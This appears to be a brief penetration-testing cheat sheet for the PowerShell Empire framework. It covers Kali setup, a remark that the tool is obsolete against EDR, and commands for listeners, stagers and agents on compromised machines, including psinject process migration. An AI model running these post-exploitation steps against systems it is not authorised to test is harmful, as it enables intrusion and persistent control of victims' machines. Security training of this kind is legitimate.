PowerShell empire is a penetration testing framework based on PowerShell and Python.
Do not use PowerShell empire
PowerShell Empire is obsolete by modern standards due to increased monitoring on PowerShell by many EDR solutions.
Setup
Kali should have a working version installed already. DO NOT upgrade otherwise it will mess up the Python version and break the script.
If it doesn’t work anymore then use the docker image.
General
Tools
useTOOL
: enter TOOL context, e.g.uselistener
useTOOL NAME
: select a toolinfo
: show general info and options for current activated toolset OPTION VALUE
: set an optionexecute
: start toolback
: leave current context
Agents
agent
: list active agents (compromised machines)interact AGENT_NAME
: interact with agent / execute commandssysinfo
: display agent infops
: list procerssespsinject LISTENER PID
: migrate to a given PID and communicate using the given listener (has to manually switch to newly created agent after migration completes)
Types of Tools
Listener: handles incoming connections from payloads Stager: Generate payload